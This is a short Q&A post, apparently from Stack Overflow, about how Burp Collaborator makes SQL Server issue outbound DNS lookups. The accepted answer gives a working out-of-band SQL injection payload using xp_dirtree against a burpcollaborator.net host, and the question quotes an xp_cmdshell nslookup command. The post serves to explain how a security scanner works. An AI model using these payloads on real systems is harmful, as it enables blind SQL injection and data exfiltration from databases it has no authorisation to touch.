# How does Burp Collaborator send a DNS query via Sql Server and T-sql

Tags: sql-server, t-sql, dns, burp

How can Burp Collaborator send a DNS query via t-sql and Sql Server?

https://portswigger.net/burp/help/collaborator.html

I know you can use for example `exec master..xp_cmdshell 'nslookup intel.com'` or `Dns.GetHostAddresses()` in a stored procedure on SQL Server 2005 or 2008 as mentioned here: https://stackoverflow.com/a/967696/3850405

However not many servers allow `xp_cmdshell` today, rightfully so, but this means that Burp Collaborator uses something else. What? The connection only has to be outbound, nothing needs to be returned.

Answer (score 0, accepted):

Found the answer, `exec master.dbo.xp_dirtree`. Sample:

```
;exec master.dbo.xp_dirtree
'\\thezf54sgc10xfbulutcc702ito.burpcollaborator.net\plu'--
```

http://releases.portswigger.net/2015/09/1627.html

If you have Burp Suite Professional installed you can generate a link via Burp -> Burp Collaborator client and then poll for results.